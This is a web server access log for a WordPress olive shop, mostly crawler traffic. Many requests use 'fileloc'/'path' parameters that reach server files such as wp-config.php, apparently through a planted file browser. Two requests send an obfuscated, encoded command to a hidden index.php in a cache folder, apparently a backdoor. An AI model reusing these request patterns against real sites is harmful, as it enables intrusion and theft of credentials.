82.223.111.37 - - [30/Sep/2025:06:45:20 +0000] "GET /wp-content/cache/page_enhanced/aceitunaslosada.com/development044014203.html/development044014203.html/index.php?ARRAY=7o2230223n313735393231383332302p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313735393231343732302q3163666562626639363564306464303534643563373730393230343731643432222p2232223n226233626465323266356466366638343865346261386561336238326131633232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34382q35362q36342q37372q39302q3236227q HTTP/1.0" 504 3843 "-" "-"
20.171.207.168 - - [30/Sep/2025:06:47:19 +0000] "GET /1175593827?path=/var HTTP/1.0" 200 6372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:20 +0000] "GET /2014345543?fileloc=/var/www/vhosts/aceitunaslosada.com/systemtest%20(1).php&path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 32238 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:21 +0000] "GET /2014244773?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:21 +0000] "GET /2120829857?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:21 +0000] "GET /113787931?items=0113643390 HTTP/1.0" 200 22900 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.2.191.202 - - [30/Sep/2025:06:47:21 +0000] "GET /producto/aceituna-gordal-rellena-de-ajo/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MQ HTTP/1.0" 200 6927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:47:22 +0000] "GET /2013940449?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:22 +0000] "GET /1904747186?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.8 - - [30/Sep/2025:06:47:22 +0000] "POST /get-message-notify HTTP/1.0" 200 22732 "https://aceitunaslosada.com/1628177761?items=1626099134" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:23 +0000] "GET /2014153425?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.31 - - [30/Sep/2025:06:47:24 +0000] "GET /robots.txt HTTP/1.0" 200 3796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.168 - - [30/Sep/2025:06:47:23 +0000] "GET /1595462202?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:24 +0000] "GET /1062677393?items=1061320990 HTTP/1.0" 200 25020 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.31 - - [30/Sep/2025:06:47:24 +0000] "GET /item/u66/16214?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-cron.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 8076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.76 - - [30/Sep/2025:06:47:24 +0000] "GET /2014163630?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.31 - - [30/Sep/2025:06:47:24 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Foptions.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 7321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:25 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-activate.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 8840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.212.219.113 - - [30/Sep/2025:06:47:25 +0000] "GET /producto/mix-de-aceitunas-naturales-sin-hueso-2/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/cache/page_enhanced/www.aceitunaslosada.com/5d1chhizlngit2th HTTP/1.0" 200 6830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.31 - - [30/Sep/2025:06:47:25 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fxmlrpc.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 7789 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:25 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-config.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 8206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:25 +0000] "GET /item/u66/16214?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-blog-header.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 6724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.76 - - [30/Sep/2025:06:47:25 +0000] "GET /2014052175?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.31 - - [30/Sep/2025:06:47:26 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-links-opml.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 7490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:25 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fxmlrpcx.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 344679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:26 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-config-sample.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 7539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:26 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-cron.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 8075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:27 +0000] "GET /item/u66/16232?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-blog-header.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb HTTP/1.0" 200 6723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.168 - - [30/Sep/2025:06:47:27 +0000] "GET /2087670596?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:27 +0000] "GET /1083823121?items=1082439710 HTTP/1.0" 200 24888 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [30/Sep/2025:06:47:27 +0000] "GET /rat276004123.html HTTP/1.0" 200 24115 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.79.136 - - [30/Sep/2025:06:47:27 +0000] "GET /375974116 HTTP/1.0" 200 24285 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.31 - - [30/Sep/2025:06:47:28 +0000] "GET /item/u95/url%20%22optional%20title%22?path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Fwoocommerce%2Fincludes%2Fshortcodes HTTP/1.0" 200 6976 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.137 - - [30/Sep/2025:06:47:30 +0000] "GET /robots.txt HTTP/1.0" 200 3796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.31 - - [30/Sep/2025:06:47:28 +0000] "GET /item/u95/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Finsta-gallery%2Fbuild%2Fbackend%2Fjs%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Finsta-gallery%2Fbuild%2Fbackend%2Fjs HTTP/1.0" 200 6539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:28 +0000] "GET /item/u95/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Fjetpack%2F_inc%2Flib%2Fmarkdown%2FREADME.md&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Fjetpack%2F_inc%2Flib%2Fmarkdown HTTP/1.0" 200 6977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:28 +0000] "GET /item/u95/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-admin%2Fjs%2Fwidgets%2Fcustom-html-widgets.js&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-admin%2Fjs%2Fwidgets HTTP/1.0" 200 10838 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Sep/2025:06:47:29 +0000] "GET /item/u95/url%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Fviews%2Fcss_editor.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Fviews HTTP/1.0" 200 8035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.136 - - [30/Sep/2025:06:47:29 +0000] "GET /1560759403?items=1558766878 HTTP/1.0" 200 23898 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:47:29 +0000] "GET /1997730275?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.23.104.107 - - [30/Sep/2025:06:47:29 +0000] "GET /producto/aceituna-cornicabra-natural/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/cache/page_enhanced/www.aceitunaslosada.com//1ppvsozdy HTTP/1.0" 200 6827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.31 - - [30/Sep/2025:06:47:30 +0000] "GET /item/u95/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2Fwp-smushit%2F_src%2Fjs%2Ffrontend HTTP/1.0" 200 6920 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.8 - - [30/Sep/2025:06:47:30 +0000] "GET /item/u43/32679/ HTTP/1.0" 200 24352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.31 - - [30/Sep/2025:06:47:30 +0000] "GET /item/u95/url%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Fclasses%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Fclasses HTTP/1.0" 200 6459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.137 - - [30/Sep/2025:06:47:30 +0000] "GET /1841296006?items=1838945198 HTTP/1.0" 200 23324 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.31 - - [30/Sep/2025:06:47:30 +0000] "GET /item/u95/url%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Ftmp%2Fcache%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Faceitunaslosada.com%2Fweb%2Fwp-content%2Fplugins%2FLayerSlider%2Fassets%2Ftmp%2Fcache HTTP/1.0" 200 6468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.136 - - [30/Sep/2025:06:47:32 +0000] "GET /370583735?items=0370111230 HTTP/1.0" 200 24824 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.136 - - [30/Sep/2025:06:47:32 +0000] "GET /?pid=27872718076&channel=visitor-invisible-coal&cate_id=9776&page=https://www.aceitunaslosada.com/chat.jsp?business191018292.html HTTP/1.0" 200 25195 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:33 +0000] "GET /2014400092?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.27.222 - - [30/Sep/2025:06:47:34 +0000] "GET /producto/gordal-sin-hueso-piripiri/?fileloc=/var/www/vhosts/aceitunaslosada.com/web/copia/wp-content/plugins/w3-total-cache/lib/Aws/Aws/data/cloudfront/2017-03-25/waiters-2.json.php&path=/var/www/vhosts/aceitunaslosada.com/web/copia/wp-content/plugins/w3-total-cache/lib/Aws/Aws/data/cloudfront/2017-03-25 HTTP/1.0" 200 6778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.168 - - [30/Sep/2025:06:47:34 +0000] "GET /1194065355?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.158.234 - - [30/Sep/2025:06:47:34 +0000] "GET /419001827?items=0418467486 HTTP/1.0" 200 8517 "https://aceitunaslosada.com/sitemap-product-960.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.79.136 - - [30/Sep/2025:06:47:34 +0000] "GET /113593970?items=0113449678 HTTP/1.0" 200 24330 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.136 - - [30/Sep/2025:06:47:36 +0000] "GET /1083736961?items=1082353662 HTTP/1.0" 200 24343 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:47:37 +0000] "GET /2087845476?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.76 - - [30/Sep/2025:06:47:37 +0000] "GET /2014066002?path=/var/www/vhosts/aceitunaslosada.com/insta-gallery HTTP/1.0" 200 7135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:39 +0000] "GET /690557185?fileloc=/var/www/vhosts/aceitunaslosada.com/web/radio.php&path=/var/www/vhosts/aceitunaslosada.com/web HTTP/1.0" 200 9003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.138.148 - - [30/Sep/2025:06:47:39 +0000] "GET /producto/gordal-sin-hueso-estilo-picante/?fileloc=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/api-2.json.php&path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27 HTTP/1.0" 200 11202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:47:39 +0000] "GET /2014088189?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:39 +0000] "GET /1084083613?items=1082699870 HTTP/1.0" 200 24125 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.223.111.37 - - [30/Sep/2025:06:45:41 +0000] "GET /wp-content/cache/page_enhanced/aceitunaslosada.com/development044014203.html/development044014203.html/index.php?ARRAY=7o2230223n313735393231383334312p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313735393231343734312q3032376161663137366534353261633164663133333939356466363738666636222p2232223n226233626465323266356466366638343865346261386561336238326131633232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34382q35362q36342q37372q39302q3236227q HTTP/1.0" 504 3843 "-" "-"
5.39.1.233 - - [30/Sep/2025:06:47:41 +0000] "GET /aceituna-alorena-partida-natural-2/?fileloc=/var/www/vhosts/aceitunaslosada.com/web/schallfuns.php&path=/var/www/vhosts/aceitunaslosada.com/web HTTP/1.0" 200 8667 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.76 - - [30/Sep/2025:06:47:41 +0000] "GET /2014091331?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:41 +0000] "GET /391357514?items=0390858478 HTTP/1.0" 200 22885 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.168 - - [30/Sep/2025:06:47:41 +0000] "GET /1312950580?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.70.209.13 - - [30/Sep/2025:06:47:42 +0000] "GET /producto/aceituna-gordal-rellena-de-ajo/?path=/var/www/vhosts/aceitunaslosada.com/web/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CostandUsageReportService HTTP/1.0" 200 6946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.8 - - [30/Sep/2025:06:47:42 +0000] "GET /?351105801?items=0350658174 HTTP/1.0" 200 25115 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.79 - - [30/Sep/2025:06:47:42 +0000] "GET /JvbpmeBL HTTP/1.0" 200 24842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.171.207.76 - - [30/Sep/2025:06:47:42 +0000] "GET /2014431123?path=/var/www/vhosts/aceitunaslosada.com/.composer HTTP/1.0" 200 6827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.136 - - [30/Sep/2025:06:47:43 +0000] "GET /1086551117?items=1085164222 HTTP/1.0" 200 23431 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:43 +0000] "GET /2014114815?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.137 - - [30/Sep/2025:06:47:44 +0000] "POST /get-message-notify HTTP/1.0" 200 22750 "https://www.aceitunaslosada.com/1083736961?items=1082353662" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.76 - - [30/Sep/2025:06:47:45 +0000] "GET /2014228866?path=/var/www/vhosts/aceitunaslosada.com HTTP/1.0" 200 7373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.168 - - [30/Sep/2025:06:47:45 +0000] "GET /2039216251?path=/var HTTP/1.0" 200 6373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.193.102.198 - - [30/Sep/2025:06:47:45 +0000] "GET /2020/10/06/nueva-linea-ecologica/?fileloc=/var/www/vhosts/aceitunaslosada.com/web/copia/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller/Files.php&path=/var/www/vhosts/aceitunaslosada.com/web/copia/wp-content/plugins/w3-total-cache/lib/Minify/Minify/Controller HTTP/1.0" 200 7310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.137 - - [30/Sep/2025:06:47:45 +0000] "POST /get-message-notify HTTP/1.0" 200 22750 "https://www.aceitunaslosada.com/391357514?items=0390858478" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
